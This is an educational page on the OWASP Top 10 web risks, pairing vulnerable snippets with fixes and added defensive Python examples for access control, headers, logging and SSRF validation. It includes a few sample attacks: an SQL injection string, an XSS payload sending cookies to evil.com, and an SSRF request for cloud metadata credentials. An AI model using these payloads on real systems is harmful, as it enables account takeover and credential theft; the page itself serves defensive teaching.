OWASP Top 10 (2023)
Introduction to Web Security
Web applications are the primary attack surface for modern organizations. With 43% of data breaches involving web applications, understanding and mitigating web vulnerabilities is critical for any security program.
Key Statistics
- 95% of web applications have at least one vulnerability
- Average time to fix critical vulnerabilities: 205 days
- Web attacks increased 22% year-over-year
A01 Broken Access Control
Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification, or destruction of data.
IDOR (Insecure Direct Object Reference)
An attacker changes an object reference the application exposes (such as an ID in a URL) to reach data they are not authorized to see. The flaw is that the server looks the object up but never checks who is asking.
# Vulnerable endpoint - user can access any order
GET /api/orders/12345
# Attacker changes ID
GET /api/orders/12346 # Accesses another user's order!
Prevention
# Python Flask - Secure implementation
from flask import Flask, abort, jsonify
from flask_login import current_user, login_required

app = Flask(__name__)

@app.route('/api/orders/<int:order_id>')
@login_required
def get_order(order_id):
    order = Order.query.get_or_404(order_id)
    # CRITICAL: verify ownership before returning anything
    if order.user_id != current_user.id:
        abort(403)  # Forbidden
    return jsonify(order.to_dict())
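The ownership check from the Flask snippet, written without a framework so it runs stand-alone, as an added example that is not code from the original page. The order rows and user IDs are constructed; the `OrderService`, `access_outcome` and exception names are this example's own.

```python
# Added example (not code from the original page): the ownership check from the
# Flask snippet above, written framework-free so it runs stand-alone. Data below
# is constructed.
import logging
from dataclasses import dataclass, field

logging.basicConfig(level=logging.WARNING, format="%(levelname)s %(message)s")
log = logging.getLogger("authz")


class NotFound(Exception):
    """The referenced object does not exist."""


class Forbidden(Exception):
    """The caller is authenticated but does not own the referenced object."""


@dataclass(frozen=True)
class Order:
    order_id: int
    user_id: int
    total_cents: int


@dataclass
class OrderService:
    # Constructed sample rows standing in for the orders table.
    orders: dict = field(default_factory=lambda: {
        12345: Order(12345, user_id=1, total_cents=4999),
        12346: Order(12346, user_id=2, total_cents=12000),
    })

    def get_order(self, current_user_id: int, order_id: int) -> Order:
        """Return an order only if it belongs to the caller.

        The ownership test runs server-side on every lookup; the client-supplied
        ID stays untrusted even after it is found to exist. Denials are logged
        (see A09): a run of 403s across consecutive IDs is what IDOR probing
        looks like in the logs.
        """
        order = self.orders.get(order_id)
        if order is None:
            raise NotFound(order_id)
        if order.user_id != current_user_id:
            log.warning("access denied user=%s order=%s owner=%s",
                        current_user_id, order_id, order.user_id)
            raise Forbidden(order_id)
        return order

    def list_orders(self, current_user_id: int) -> list:
        """Scope the query by owner so foreign IDs are never reachable at all."""
        return [o for o in self.orders.values() if o.user_id == current_user_id]


def access_outcome(svc: OrderService, current_user_id: int, order_id: int) -> str:
    """Map the result of a lookup to the HTTP status the endpoint would return."""
    try:
        svc.get_order(current_user_id, order_id)
    except NotFound:
        return "404"
    except Forbidden:
        return "403"
    return "200"


if __name__ == "__main__":
    svc = OrderService()
    for user_id, order_id in [(1, 12345), (1, 12346), (1, 99999)]:
        print(user_id, order_id, access_outcome(svc, user_id, order_id))
```

The page's endpoint answers 403 for a foreign order; many teams return 404 for both "missing" and "not yours" so that a probe cannot learn which IDs exist. `list_orders` shows the pattern that avoids the problem entirely: filter by the authenticated owner in the query itself instead of checking after the fact.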
A02 Cryptographic Failures
Previously known as "Sensitive Data Exposure." This focuses on failures related to cryptography which often lead to sensitive data exposure.
Common Failures
- Transmitting data in cleartext (HTTP instead of HTTPS)
- Using deprecated cryptographic algorithms (MD5, SHA1, DES)
- Weak or default encryption keys
- Not validating SSL/TLS certificates
- Storing passwords with reversible encryption
Secure Password Storage
# Python - Use bcrypt or Argon2
import bcrypt

def hash_password(password: str) -> bytes:
    # Hashing password: gensalt() picks a fresh random salt; rounds=12 is the work factor
    return bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))

def verify_password(provided_password: str, stored_hash: bytes) -> bool:
    # Verification: checkpw reads salt and cost from stored_hash and compares in constant time
    return bcrypt.checkpw(provided_password.encode(), stored_hash)
A03 Injection
Injection flaws occur when an attacker can send hostile data to an interpreter. SQL injection, NoSQL injection, OS command injection, and LDAP injection are common examples.
SQL Injection
# VULNERABLE - Direct string concatenation
query = f"SELECT * FROM users WHERE username = '{username}'"
# Attack payload
username = "admin' OR '1'='1' --"
# Results in: SELECT * FROM users WHERE username = 'admin' OR '1'='1' --'
Prevention: Parameterized Queries
# Python - SQLAlchemy (ORM)
user = User.query.filter_by(username=username).first()
# Python - Raw SQL with parameters
cursor.execute("SELECT * FROM users WHERE username = %s", (username,))
# Node.js - Prepared statements
db.query('SELECT * FROM users WHERE username = ?', [username]);
Cross-Site Scripting (XSS)
<!-- Vulnerable: Reflected XSS -->
<p>Search results for: <?php echo $_GET['query']; ?></p>
<!-- Attack -->
?query=<script>document.location='http://evil.com/steal?c='+document.cookie</script>
Prevention
<!-- PHP - Escape output -->
<p>Search results for: <?php echo htmlspecialchars($_GET['query'], ENT_QUOTES, 'UTF-8'); ?></p>
<!-- React - Automatically escaped -->
<p>Search results for: {query}</p>
<!-- Content Security Policy header -->
Content-Security-Policy: default-src 'self'; script-src 'self'
A04 Insecure Design
Focuses on risks related to design and architectural flaws. Cannot be fixed by perfect implementation alone—secure design patterns must be used from the start.
A05 Security Misconfiguration
Covers improperly configured permissions, default accounts left in place, unnecessary features enabled, and missing security patches.
# Secure HTTP headers to set
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'
X-XSS-Protection: 1; mode=block
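Headers like these are easiest to get right when one component adds them to every response rather than each handler remembering to. The following added example (not code from the original page) is a WSGI middleware that does so for any WSGI application; the class and helper names are this example's own, and `hello_app` is a constructed stand-in for a real application. `X-XSS-Protection` is deliberately left out: current browsers ignore it and OWASP's header guidance now recommends not enabling it.

```python
# Added example (not from the original page): WSGI middleware that applies the
# security headers listed above to every response. Standard library only.
from wsgiref.headers import Headers

SECURITY_HEADERS = {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
    "Referrer-Policy": "no-referrer",
    # X-XSS-Protection omitted on purpose: obsolete, and OWASP advises against it.
}


class SecurityHeadersMiddleware:
    """Wrap a WSGI app and add SECURITY_HEADERS to each response."""

    def __init__(self, app, headers=None):
        self.app = app
        self.headers = dict(SECURITY_HEADERS if headers is None else headers)

    def __call__(self, environ, start_response):
        def _start_response(status, response_headers, exc_info=None):
            hdrs = Headers(list(response_headers))
            for name, value in self.headers.items():
                if name not in hdrs:             # a handler may set a stricter value itself
                    hdrs.add_header(name, value)
            return start_response(status, hdrs.items(), exc_info)
        return self.app(environ, _start_response)


def hello_app(environ, start_response):
    """Constructed minimal WSGI app used to exercise the middleware."""
    start_response("200 OK", [("Content-Type", "text/plain; charset=utf-8")])
    return [b"hello"]


def strict_csp_app(environ, start_response):
    """Constructed app that sets its own CSP; the middleware must not overwrite it."""
    start_response("200 OK", [("Content-Type", "text/html"),
                              ("Content-Security-Policy", "default-src 'none'")])
    return [b""]


def headers_for(app, path="/") -> dict:
    """Drive a WSGI app with a constructed GET request; return status, headers, body."""
    captured = {}

    def start_response(status, response_headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = dict(response_headers)

    captured["body"] = b"".join(app({"REQUEST_METHOD": "GET", "PATH_INFO": path},
                                    start_response))
    return captured


if __name__ == "__main__":
    for name, value in headers_for(SecurityHeadersMiddleware(hello_app))["headers"].items():
        print(f"{name}: {value}")
```

Flask, Django and most other Python frameworks expose their WSGI callable, so `SecurityHeadersMiddleware(app.wsgi_app)` (Flask) or wrapping the object returned by `get_wsgi_application()` (Django) is enough to cover every route, including error pages and static files that individual handlers never see.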
A06 Vulnerable and Outdated Components
Using components with known vulnerabilities. Regular dependency scanning is essential.
# Check for vulnerabilities
npm audit
pip-audit
snyk test
trivy fs .
A07 Identification and Authentication Failures
Covers weak password requirements, improper session management, and exposure to credential stuffing (replaying username/password pairs leaked from other sites).
A08 Software and Data Integrity Failures
Code and infrastructure that does not protect against integrity violations. Includes insecure deserialization and CI/CD pipeline security.
A09 Security Logging and Monitoring Failures
Without proper logging and monitoring, breaches cannot be detected. Log authentication events, access control failures, and server-side input validation failures.
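The two sections above fit together: A09 says which events to record, and A07's credential stuffing is one of the things those records make detectable. The added example below (not code from the original page) emits the authentication and access control events as JSON lines, then reads such lines back and flags a source address with many failed logins across many distinct usernames in a short window. All log lines are constructed, and the function names and thresholds are this example's own choices.

```python
# Added example (not from the original page): structured security event logging
# (A09) and a detector for the credential-stuffing pattern (A07) over those logs.
import json
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Values under these keys must never reach the log, whatever the caller passes.
REDACTED_FIELDS = {"password", "token", "session_id", "authorization"}


def log_event(event: str, outcome: str, **fields) -> str:
    """Return one JSON log line with a UTC timestamp and secrets redacted."""
    record = {"ts": datetime.now(timezone.utc).isoformat(), "event": event, "outcome": outcome}
    record.update({k: ("[redacted]" if k in REDACTED_FIELDS else v) for k, v in fields.items()})
    return json.dumps(record, sort_keys=True)


def parse_event(line: str) -> dict:
    return json.loads(line)


# Constructed sample log: one address spraying six usernames in 36 seconds,
# one user mistyping their own password twice, and one access control denial.
SAMPLE_LOG = """\
{"ts": "2024-12-01T10:00:00+00:00", "event": "login", "outcome": "failure", "user": "alice", "src_ip": "203.0.113.7"}
{"ts": "2024-12-01T10:00:08+00:00", "event": "login", "outcome": "failure", "user": "bob", "src_ip": "203.0.113.7"}
{"ts": "2024-12-01T10:00:15+00:00", "event": "login", "outcome": "failure", "user": "carol", "src_ip": "203.0.113.7"}
{"ts": "2024-12-01T10:00:21+00:00", "event": "login", "outcome": "failure", "user": "dave", "src_ip": "203.0.113.7"}
{"ts": "2024-12-01T10:00:29+00:00", "event": "login", "outcome": "failure", "user": "erin", "src_ip": "203.0.113.7"}
{"ts": "2024-12-01T10:00:36+00:00", "event": "login", "outcome": "failure", "user": "frank", "src_ip": "203.0.113.7"}
{"ts": "2024-12-01T10:01:02+00:00", "event": "login", "outcome": "failure", "user": "alice", "src_ip": "198.51.100.2"}
{"ts": "2024-12-01T10:01:20+00:00", "event": "login", "outcome": "failure", "user": "alice", "src_ip": "198.51.100.2"}
{"ts": "2024-12-01T10:01:41+00:00", "event": "login", "outcome": "success", "user": "alice", "src_ip": "198.51.100.2"}
{"ts": "2024-12-01T10:02:00+00:00", "event": "authz", "outcome": "denied", "user": "bob", "src_ip": "198.51.100.9", "resource": "/api/orders/12346"}
"""


def detect_credential_stuffing(lines, *, window=timedelta(minutes=5),
                               min_failures=5, min_users=3) -> dict:
    """Flag source IPs with >= min_failures failed logins spanning >= min_users
    distinct usernames inside one sliding window. Someone mistyping their own
    password never trips it; spraying a leaked credential list does."""
    failures = defaultdict(list)                        # src_ip -> [(ts, user), ...]
    for line in lines:
        if not line.strip():
            continue
        rec = parse_event(line)
        if rec.get("event") == "login" and rec.get("outcome") == "failure":
            failures[rec["src_ip"]].append((datetime.fromisoformat(rec["ts"]), rec["user"]))

    flagged = {}
    for ip, events in failures.items():
        events.sort()
        start, best = 0, (0, 0)
        for end, (ts, _) in enumerate(events):
            while ts - events[start][0] > window:       # slide the window's left edge
                start += 1
            win = events[start:end + 1]
            users = {u for _, u in win}
            if len(win) >= min_failures and len(users) >= min_users:
                best = max(best, (len(win), len(users)))
        if best != (0, 0):
            flagged[ip] = {"failures": best[0], "distinct_users": best[1]}
    return flagged


if __name__ == "__main__":
    print(log_event("login", "failure", user="alice", src_ip="192.0.2.1", password="hunter2"))
    print(detect_credential_stuffing(SAMPLE_LOG.splitlines()))
```

The distinct-user threshold is what separates stuffing from an ordinary lockout case, and it only works if every failed login is logged with the attempted username and source address. Note that the `authz` denial line is the record the A01 section's 403 would produce; the same detector shape, keyed on `resource` instead of `user`, catches IDOR probing.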
A10 Server-Side Request Forgery (SSRF)
SSRF occurs when a web application fetches a remote resource without validating the user-supplied URL.
# Attack: Access internal metadata service
POST /fetch-image
url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Prevention: Whitelist allowed domains
from urllib.parse import urlparse

ALLOWED_DOMAINS = ['cdn.example.com', 'images.example.com']
if urlparse(url).netloc not in ALLOWED_DOMAINS:
    abort(403)
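The host allowlist above is the right starting point; the added example below (not code from the original page) extends it with the checks a fetcher usually also needs: pin the scheme, refuse userinfo and explicit ports, and resolve the allowed host to confirm none of its answers fall in loopback, link-local (which includes the 169.254.169.254 metadata range) or private space. The resolver is injectable so the example runs offline; the `FAKE_DNS` table and the function names are constructed for this example, with 93.184.216.34 standing in for a public address.

```python
# Added example (not from the original page): stricter SSRF validation for a
# user-supplied fetch URL. Standard library only; DNS answers below are constructed.
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_DOMAINS = {"cdn.example.com", "images.example.com"}
ALLOWED_SCHEMES = {"https"}


class UnsafeURL(ValueError):
    """Raised with the reason a URL was refused."""


def system_resolver(host: str) -> list:
    """Live DNS lookup returning every answer, so no address goes unchecked."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_fetch_url(url: str, resolver=system_resolver) -> str:
    """Return url unchanged if it passes every check, else raise UnsafeURL."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme {parts.scheme!r} not allowed")
    try:
        port = parts.port                      # raises ValueError on a malformed port
    except ValueError as exc:
        raise UnsafeURL("malformed port") from exc
    if parts.username is not None or parts.password is not None or port is not None:
        raise UnsafeURL("userinfo and explicit ports not allowed")
    host = (parts.hostname or "").rstrip(".").lower()
    if host not in ALLOWED_DOMAINS:
        raise UnsafeURL(f"host {host!r} not in allowlist")
    addrs = resolver(host)
    if not addrs:
        raise UnsafeURL(f"{host} did not resolve")
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        # is_global is False for private, loopback, link-local, reserved and
        # documentation ranges; multicast is excluded explicitly.
        if not ip.is_global or ip.is_multicast:
            raise UnsafeURL(f"{host} resolves to non-public address {addr}")
    return url


def check(url: str, resolver=system_resolver) -> tuple:
    """(accepted, reason) form of validate_fetch_url, convenient for logging."""
    try:
        validate_fetch_url(url, resolver)
    except UnsafeURL as exc:
        return False, str(exc)
    return True, "ok"


# Constructed DNS answers so the example runs offline. 93.184.216.34 stands in
# for a public address; 10.0.0.5 is the internal answer a rebinding attack adds.
FAKE_DNS = {
    "cdn.example.com": ["93.184.216.34"],
    "images.example.com": ["93.184.216.34", "10.0.0.5"],
}


def fake_resolver(host: str) -> list:
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for candidate in ["https://cdn.example.com/a.png",
                      "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
                      "https://cdn.example.com@169.254.169.254/",
                      "https://images.example.com/x.png"]:
        print(candidate, check(candidate, fake_resolver))
```

Two caveats a fetcher built on this still has to handle. First, the name can resolve differently between this check and the actual connection, so connect to the validated address (or re-validate inside the connection step) rather than re-resolving. Second, the same validation must run on every redirect target, or the HTTP client must be told not to follow redirects at all.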
Last updated: December 2024